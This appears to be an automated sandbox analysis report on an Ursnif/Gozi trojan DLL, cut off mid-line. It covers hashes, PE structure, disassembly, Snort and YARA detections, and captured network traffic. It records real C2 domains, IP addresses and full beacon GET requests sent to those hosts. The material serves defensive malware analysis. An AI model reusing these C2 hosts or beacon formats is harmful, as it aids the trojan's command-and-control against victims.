	5BicL2hlpm.dll	Get hash	malicious	Browse	31.41.44.27
	makeAbout.dll	Get hash	malicious	Browse	31.41.44.27
	62fff09cd4239.dll	Get hash	malicious	Browse	31.41.44.27
	53xR8H5q5f	Get hash	malicious	Browse	31.41.45.138
	freeofice.dll	Get hash	malicious	Browse	31.41.46.120
	freeofice.dll	Get hash	malicious	Browse	31.41.46.120
	hhW7VpTx.dll	Get hash	malicious	Browse	31.41.46.120
	hhW7VpTx.dll	Get hash	malicious	Browse	31.41.46.120
	sNJAwzVjI1.dll	Get hash	malicious	Browse	31.41.46.120
	readme.dll	Get hash	malicious	Browse	31.41.46.120
	helf.hpl.dll	Get hash	malicious	Browse	185.68.93.4
	fx1sA5uEA6.dll	Get hash	malicious	Browse	31.41.46.120
	l86WZsZuFv.dll	Get hash	malicious	Browse	31.41.46.120
	ksbpxIpTBF.exe	Get hash	malicious	Browse	31.41.46.120
	sYYcKwk74U.exe	Get hash	malicious	Browse	31.41.46.120
	8cM8CHCI8G.exe	Get hash	malicious	Browse	31.41.46.120

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.836151375360273
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ursnif_IAT_corrected.exe.dll
File size:	57344
MD5:	8b52c277c63c5877c0e4ca32d1458957
SHA1:	1d64f4610c6e0af8a3e3a9d8e8b794fc1bebeef5
SHA256:	8d2f90927603c33947463dc9846dc1b7a220ea1f13dc1a0ccfe538d5f83bbfe2
SHA512:	9f7022155d4764e625fe1a6b5377eed4b2e7620a9bd03c7f5474112de30bb60b7898c5e9a325035544d01c3621bff103f6b857373d146c1f622772e1abbf1b99
SSDEEP:	768:A2KGmsx3R69vSvjyRpq63goMWPXE2bE/JVMq2LATqeeAeOu2D2wqmLiu6:wGBx3R6iApqlaPGhVMq2LpeReOb2Pmp
TLSH:	EB43E06A6F6008F7C1A3823636397795EA09132141356CD4E7970D381BDA95EEEBF313
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Xo.T.............v.......v..........n............................v.......v.......v......Rich............PE..L.....%c...........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:	0x10001d80
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
DLL Characteristics:
Time Stamp:	0x632596CB [Sat Sep 17 09:43:39 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	3e85858f9f91b022a15a56437fb6f7c2

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push ecx
mov eax, dword ptr [ebp+0Ch]
push ebx
push esi
push edi
xor edi, edi
inc edi
xor ebx, ebx
sub eax, ebx
mov dword ptr [ebp-04h], edi
je 00007F0F88C99A41h
dec eax
jne 00007F0F88C99A8Bh
push 10004188h
call dword ptr [10003050h]
cmp eax, edi
jne 00007F0F88C99A78h
push ebx
push 00400000h
push ebx
call dword ptr [10003038h]
mov dword ptr [10004190h], eax
cmp eax, ebx
je 00007F0F88C99A0Ch
mov eax, dword ptr [ebp+08h]
mov esi, 10004198h
mov dword ptr [100041B0h], eax
mov eax, esi
lock xadd dword ptr [eax], edi
mov ecx, dword ptr [ebp+10h]
lea eax, dword ptr [ebp+0Ch]
push eax
call 00007F0F88C99316h
push eax
push 1000177Ah
call 00007F0F88C992ADh
mov dword ptr [1000418Ch], eax
cmp eax, ebx
jne 00007F0F88C99A2Bh
or eax, FFFFFFFFh
lock xadd dword ptr [esi], eax
mov dword ptr [ebp-04h], ebx
jmp 00007F0F88C99A1Fh
push 10004188h
call dword ptr [1000304Ch]
test eax, eax
jne 00007F0F88C99A10h
cmp dword ptr [1000418Ch], ebx
je 00007F0F88C999FCh
mov esi, 00002328h
push edi
push 00000064h
call dword ptr [10003044h]
mov eax, dword ptr [10004198h]
test eax, eax
je 00007F0F88C999D9h
sub esi, 64h
cmp esi, ebx
jnle 00007F0F88C999B9h
push dword ptr [1000418Ch]
call dword ptr [1000300Ch]
push dword ptr [00000000h]

Rich Headers

Programming Language:

[ASM] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[EXP] VS2008 SP1 build 30729
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3570	0x4e	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x310c	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6000	0x14c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3000	0xbc	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x16c7	0x2000	False	0.5145263671875	data	5.2662186547605145	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x3000	0x5be	0x1000	False	0.241455078125	data	2.579542966094096	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4000	0x25c	0x1000	False	0.016357421875	Matlab v4 mat-file (little endian) *P, rows 5, columns 7, imaginary	0.0602032822141183	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x5000	0x2dc	0x1000	False	0.1953125	data	2.0330780582319483	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x6000	0x8000	0x7400	False	0.9559199892241379	data	7.8057957709243295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ntdll.dll	_snwprintf, memset, NtQuerySystemInformation, _aulldiv, RtlUnwind, NtQueryVirtualMemory
KERNEL32.dll	SetThreadAffinityMask, CloseHandle, GetLocaleInfoA, GetSystemDefaultUILanguage, SetThreadPriority, HeapFree, Sleep, ExitThread, lstrlenW, GetLastError, VerLanguageNameA, GetExitCodeThread, HeapCreate, HeapDestroy, GetCurrentThread, SleepEx, WaitForSingleObject, InterlockedDecrement, InterlockedIncrement, HeapAlloc, GetModuleHandleA, GetModuleFileNameW, SetLastError, VirtualProtect, OpenProcess, CreateEventA, GetLongPathNameW, GetVersion, GetCurrentProcessId, TerminateThread, QueueUserAPC, CreateThread, GetProcAddress, LoadLibraryA, MapViewOfFile, GetSystemTimeAsFileTime, CreateFileMappingW
ADVAPI32.dll	ConvertStringSecurityDescriptorToSecurityDescriptorA

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x10001c50

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.413.107.42.1649715802033204 10/21/22-00:25:18.871319	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49715	80	192.168.2.4	13.107.42.16
192.168.2.413.107.42.1649747802033204 10/21/22-00:27:40.718067	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49747	80	192.168.2.4	13.107.42.16
192.168.2.413.107.42.1649718802033204 10/21/22-00:25:20.730105	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49718	80	192.168.2.4	13.107.42.16
192.168.2.413.107.42.1649747802033203 10/21/22-00:27:40.718067	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49747	80	192.168.2.4	13.107.42.16
192.168.2.462.173.145.18349742802033203 10/21/22-00:27:12.300672	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49742	80	192.168.2.4	62.173.145.183
192.168.2.462.173.145.18349742802033204 10/21/22-00:27:12.300672	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49742	80	192.168.2.4	62.173.145.183
192.168.2.413.107.42.1649711802033203 10/21/22-00:25:09.002887	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49711	80	192.168.2.4	13.107.42.16
192.168.2.48.8.8.859444532023883 10/21/22-00:25:29.478642	UDP	2023883	ET DNS Query to a *.top domain - Likely Hostile	59444	53	192.168.2.4	8.8.8.8
192.168.2.413.107.42.1649711802033204 10/21/22-00:25:09.002887	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49711	80	192.168.2.4	13.107.42.16
192.168.2.48.8.8.858914532023883 10/21/22-00:27:11.884556	UDP	2023883	ET DNS Query to a *.top domain - Likely Hostile	58914	53	192.168.2.4	8.8.8.8
192.168.2.413.107.42.1649719802033203 10/21/22-00:25:23.881073	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49719	80	192.168.2.4	13.107.42.16
192.168.2.462.173.145.18349743802033203 10/21/22-00:27:20.607846	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49743	80	192.168.2.4	62.173.145.183
192.168.2.462.173.145.18349743802033204 10/21/22-00:27:20.607846	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49743	80	192.168.2.4	62.173.145.183
192.168.2.462.173.145.18349744802033204 10/21/22-00:27:22.814108	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49744	80	192.168.2.4	62.173.145.183
192.168.2.413.107.42.1649748802033203 10/21/22-00:27:42.910400	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49748	80	192.168.2.4	13.107.42.16
192.168.2.413.107.42.1649746802033204 10/21/22-00:27:32.445316	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49746	80	192.168.2.4	13.107.42.16
192.168.2.413.107.42.1649748802033204 10/21/22-00:27:42.910400	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49748	80	192.168.2.4	13.107.42.16
192.168.2.462.173.145.18349744802033203 10/21/22-00:27:22.814108	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49744	80	192.168.2.4	62.173.145.183
192.168.2.462.173.145.18349745802033204 10/21/22-00:27:25.963477	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49745	80	192.168.2.4	62.173.145.183

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 21, 2022 00:25:29.918468952 CEST	49720	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:25:33.074470997 CEST	49720	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:25:39.090687990 CEST	49720	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:25:39.379411936 CEST	49721	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:25:41.311271906 CEST	49722	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:25:42.372112989 CEST	49721	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:25:44.325324059 CEST	49722	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:25:44.510185957 CEST	49723	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:25:47.513168097 CEST	49723	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:25:48.372597933 CEST	49721	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:25:50.404005051 CEST	49722	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:25:53.529212952 CEST	49723	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:27:12.204819918 CEST	49742	80	192.168.2.4	62.173.145.183
Oct 21, 2022 00:27:12.263849974 CEST	80	49742	62.173.145.183	192.168.2.4
Oct 21, 2022 00:27:12.263995886 CEST	49742	80	192.168.2.4	62.173.145.183
Oct 21, 2022 00:27:12.300672054 CEST	49742	80	192.168.2.4	62.173.145.183
Oct 21, 2022 00:27:12.361299992 CEST	80	49742	62.173.145.183	192.168.2.4
Oct 21, 2022 00:27:12.361354113 CEST	80	49742	62.173.145.183	192.168.2.4
Oct 21, 2022 00:27:12.361531019 CEST	49742	80	192.168.2.4	62.173.145.183
Oct 21, 2022 00:27:12.396564960 CEST	49742	80	192.168.2.4	62.173.145.183
Oct 21, 2022 00:27:12.455626965 CEST	80	49742	62.173.145.183	192.168.2.4
Oct 21, 2022 00:27:20.546178102 CEST	49743	80	192.168.2.4	62.173.145.183
Oct 21, 2022 00:27:20.606978893 CEST	80	49743	62.173.145.183	192.168.2.4
Oct 21, 2022 00:27:20.607181072 CEST	49743	80	192.168.2.4	62.173.145.183
Oct 21, 2022 00:27:20.607846022 CEST	49743	80	192.168.2.4	62.173.145.183
Oct 21, 2022 00:27:20.668095112 CEST	80	49743	62.173.145.183	192.168.2.4
Oct 21, 2022 00:27:20.668124914 CEST	80	49743	62.173.145.183	192.168.2.4
Oct 21, 2022 00:27:20.668193102 CEST	49743	80	192.168.2.4	62.173.145.183
Oct 21, 2022 00:27:20.668384075 CEST	49743	80	192.168.2.4	62.173.145.183
Oct 21, 2022 00:27:20.729041100 CEST	80	49743	62.173.145.183	192.168.2.4
Oct 21, 2022 00:27:22.748816013 CEST	49744	80	192.168.2.4	62.173.145.183
Oct 21, 2022 00:27:22.807856083 CEST	80	49744	62.173.145.183	192.168.2.4
Oct 21, 2022 00:27:22.808012962 CEST	49744	80	192.168.2.4	62.173.145.183
Oct 21, 2022 00:27:22.814107895 CEST	49744	80	192.168.2.4	62.173.145.183
Oct 21, 2022 00:27:22.872728109 CEST	80	49744	62.173.145.183	192.168.2.4
Oct 21, 2022 00:27:22.872811079 CEST	80	49744	62.173.145.183	192.168.2.4
Oct 21, 2022 00:27:22.873013020 CEST	49744	80	192.168.2.4	62.173.145.183
Oct 21, 2022 00:27:22.873074055 CEST	49744	80	192.168.2.4	62.173.145.183
Oct 21, 2022 00:27:22.931992054 CEST	80	49744	62.173.145.183	192.168.2.4
Oct 21, 2022 00:27:25.901638985 CEST	49745	80	192.168.2.4	62.173.145.183
Oct 21, 2022 00:27:25.962555885 CEST	80	49745	62.173.145.183	192.168.2.4
Oct 21, 2022 00:27:25.962951899 CEST	49745	80	192.168.2.4	62.173.145.183
Oct 21, 2022 00:27:25.963476896 CEST	49745	80	192.168.2.4	62.173.145.183
Oct 21, 2022 00:27:26.023914099 CEST	80	49745	62.173.145.183	192.168.2.4
Oct 21, 2022 00:27:26.023978949 CEST	80	49745	62.173.145.183	192.168.2.4
Oct 21, 2022 00:27:26.024106979 CEST	49745	80	192.168.2.4	62.173.145.183
Oct 21, 2022 00:27:26.024324894 CEST	49745	80	192.168.2.4	62.173.145.183
Oct 21, 2022 00:27:26.084299088 CEST	80	49745	62.173.145.183	192.168.2.4
Oct 21, 2022 00:27:52.484318018 CEST	49750	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:27:55.492575884 CEST	49750	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:28:00.769026995 CEST	49751	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:28:01.493290901 CEST	49750	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:28:02.951421976 CEST	49752	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:28:03.774499893 CEST	49751	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:28:05.946647882 CEST	49752	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:28:06.140753984 CEST	49753	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:28:09.149972916 CEST	49753	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:28:09.775011063 CEST	49751	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:28:11.947268009 CEST	49752	80	192.168.2.4	31.41.44.194
Oct 21, 2022 00:28:15.150471926 CEST	49753	80	192.168.2.4	31.41.44.194

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 21, 2022 00:25:29.478641987 CEST	59444	53	192.168.2.4	8.8.8.8
Oct 21, 2022 00:25:29.915838957 CEST	53	59444	8.8.8.8	192.168.2.4
Oct 21, 2022 00:25:39.180322886 CEST	55570	53	192.168.2.4	8.8.8.8
Oct 21, 2022 00:25:39.373328924 CEST	53	55570	8.8.8.8	192.168.2.4
Oct 21, 2022 00:25:40.999285936 CEST	64906	53	192.168.2.4	8.8.8.8
Oct 21, 2022 00:25:41.308494091 CEST	53	64906	8.8.8.8	192.168.2.4
Oct 21, 2022 00:25:44.133048058 CEST	59446	53	192.168.2.4	8.8.8.8
Oct 21, 2022 00:25:44.507917881 CEST	53	59446	8.8.8.8	192.168.2.4
Oct 21, 2022 00:27:11.884556055 CEST	58914	53	192.168.2.4	8.8.8.8
Oct 21, 2022 00:27:12.202425003 CEST	53	58914	8.8.8.8	192.168.2.4
Oct 21, 2022 00:27:20.512377977 CEST	51419	53	192.168.2.4	8.8.8.8
Oct 21, 2022 00:27:20.531629086 CEST	53	51419	8.8.8.8	192.168.2.4
Oct 21, 2022 00:27:22.557136059 CEST	51054	53	192.168.2.4	8.8.8.8
Oct 21, 2022 00:27:22.746049881 CEST	53	51054	8.8.8.8	192.168.2.4
Oct 21, 2022 00:27:25.861325979 CEST	55673	53	192.168.2.4	8.8.8.8
Oct 21, 2022 00:27:25.882078886 CEST	53	55673	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 21, 2022 00:25:29.478641987 CEST	192.168.2.4	8.8.8.8	0x180a	Standard query (0)	onlinetwork.top	A (IP address)	IN (0x0001)	false
Oct 21, 2022 00:25:39.180322886 CEST	192.168.2.4	8.8.8.8	0xd013	Standard query (0)	onlinetwork.top	A (IP address)	IN (0x0001)	false
Oct 21, 2022 00:25:40.999285936 CEST	192.168.2.4	8.8.8.8	0x3dcd	Standard query (0)	onlinetwork.top	A (IP address)	IN (0x0001)	false
Oct 21, 2022 00:25:44.133048058 CEST	192.168.2.4	8.8.8.8	0xf19f	Standard query (0)	onlinetwork.top	A (IP address)	IN (0x0001)	false
Oct 21, 2022 00:27:11.884556055 CEST	192.168.2.4	8.8.8.8	0xdd20	Standard query (0)	linetwork.top	A (IP address)	IN (0x0001)	false
Oct 21, 2022 00:27:20.512377977 CEST	192.168.2.4	8.8.8.8	0xd8f	Standard query (0)	linetwork.top	A (IP address)	IN (0x0001)	false
Oct 21, 2022 00:27:22.557136059 CEST	192.168.2.4	8.8.8.8	0x4b6c	Standard query (0)	linetwork.top	A (IP address)	IN (0x0001)	false
Oct 21, 2022 00:27:25.861325979 CEST	192.168.2.4	8.8.8.8	0xe014	Standard query (0)	linetwork.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 21, 2022 00:25:29.915838957 CEST	8.8.8.8	192.168.2.4	0x180a	No error (0)	onlinetwork.top	31.41.44.194	A (IP address)	IN (0x0001)	false
Oct 21, 2022 00:25:39.373328924 CEST	8.8.8.8	192.168.2.4	0xd013	No error (0)	onlinetwork.top	31.41.44.194	A (IP address)	IN (0x0001)	false
Oct 21, 2022 00:25:41.308494091 CEST	8.8.8.8	192.168.2.4	0x3dcd	No error (0)	onlinetwork.top	31.41.44.194	A (IP address)	IN (0x0001)	false
Oct 21, 2022 00:25:44.507917881 CEST	8.8.8.8	192.168.2.4	0xf19f	No error (0)	onlinetwork.top	31.41.44.194	A (IP address)	IN (0x0001)	false
Oct 21, 2022 00:27:12.202425003 CEST	8.8.8.8	192.168.2.4	0xdd20	No error (0)	linetwork.top	62.173.145.183	A (IP address)	IN (0x0001)	false
Oct 21, 2022 00:27:20.531629086 CEST	8.8.8.8	192.168.2.4	0xd8f	No error (0)	linetwork.top	62.173.145.183	A (IP address)	IN (0x0001)	false
Oct 21, 2022 00:27:22.746049881 CEST	8.8.8.8	192.168.2.4	0x4b6c	No error (0)	linetwork.top	62.173.145.183	A (IP address)	IN (0x0001)	false
Oct 21, 2022 00:27:25.882078886 CEST	8.8.8.8	192.168.2.4	0xe014	No error (0)	linetwork.top	62.173.145.183	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

linetwork.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49742	62.173.145.183	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Oct 21, 2022 00:27:12.300672054 CEST	8777	OUT	GET /drew/fJ29sqPsP/PB4FnwvByjBglXFYEjZ1/hXe9prWt3B5GwuDq98v/uxK6HJV9Vv2hGb4_2BzE87/_2B7cwHJr4KZl/Z2JNy_2F/FQTy6SE98GzpaP4OycRAbeK/FNb75e_2BZ/vDSt33A5GpRAp0Wp5/3sRCo7L7mC_2/FRcDNZgk7ge/0DV7I1SHotZIJK/MawMR4TykLq9DH4qoWZqU/9lh5zRf0UXFuxlAr/44doOlzEgahzUed/pTo7pwfqznm_2FNsdD/ONqwlJdhn/hTW0RFx_2FoxngXj4_2B/7VTtckioJ/RQjhyCJh.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: linetwork.top Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49743	62.173.145.183	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Oct 21, 2022 00:27:20.607846022 CEST	8779	OUT	GET /drew/bBjIYvLPS6LWM/5hSIaVH5/Wq734Z_2BJdIJMJo3F9GITO/_2FcMitcTe/kWvqzZ_2B_2FKKbPA/PasXIoBqTiXU/g_2FlZW7Y_2/B41HTf6QrjFt_2/BVrbTt4PzlSq49i2n_2Bd/eYvDRtuGLt_2Fv6B/tiuwwj_2BAQltrY/i8qwn6NTmmAuX65G3U/G0pEw9pKd/5FnOrAI7ls4u0lmSvnEp/39rOvZP_2BCYyBu8UVC/tWjDwJwf88LN44CDcCSZK_/2BvPg5_2BjQiD/eLQzVCVR/WPugjRuufv7WeRl3hdeCsRv/aT5ChRiLQy/6L.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: linetwork.top Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49744	62.173.145.183	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Oct 21, 2022 00:27:22.814107895 CEST	8780	OUT	GET /drew/NXo6zedpn_2B_/2BcanAQX/FnyJMATt_2F48kv6_2FGokp/FknJiZ4BPO/rcHYyBUZQ99j1sGoQ/3iqH_2FJ2MwI/44xXh3ewHre/Z3uYW8oE7cSgpQ/KoDoLpaNqGjAzcl7PDDtU/W4U8yO0BLXfpg6Fg/1LkQrB_2FwF36_2/F24Alce0F3ZIABc8fP/582wfkRmY/YYSggLyv6WiREP5aRpD7/BrtAiO3VnPYflPLClgV/qChVx2f_2BaPtkYL4DoePx/ugW_2FeHancyO/tXrlnouq/Hh9J5BBA0FEI0HWw67W05n9/zd1N.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: linetwork.top Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49745	62.173.145.183	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Oct 21, 2022 00:27:25.963476896 CEST	8781	OUT	GET /drew/cLUzScwIGd6lPZFBgwJAB/boGs7r3rpKnEEW26/IZwhyzcbrBr1vrh/pacdkNsvfXz_2BJd7M/nIUnH5UJy/lraLufWTWWuSthVJSQnB/skwB6_2F4mYx1hncPnC/DX7TcGWo1RJRVk4zslIVLg/yTztrtFucPEpP/M0MfTI80/ZOv2XL0MhanRoGMyGX9uAoo/dmIzHKJR6c/gnzW6jLfOR7yWUymL/vvx15g4IZ4jD/aDLfgoeX_2F/HE40tKUB0xmnED/5US9_2FwaFREdIsGRoa7p/JuiKle06sqYmlLWx/l.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: linetwork.top Connection: Keep-Alive Cache-Control: no-cache

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exePID: 4124, Parent PID: 3528

General

Target ID:	0
Start time:	00:24:55
Start date:	21/10/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll"
Imagebase:	0xf20000
File size:	116736 bytes
MD5 hash:	1F562FBF37040EC6C43C8D5EF619EA39
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.817394092.0000000001379000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 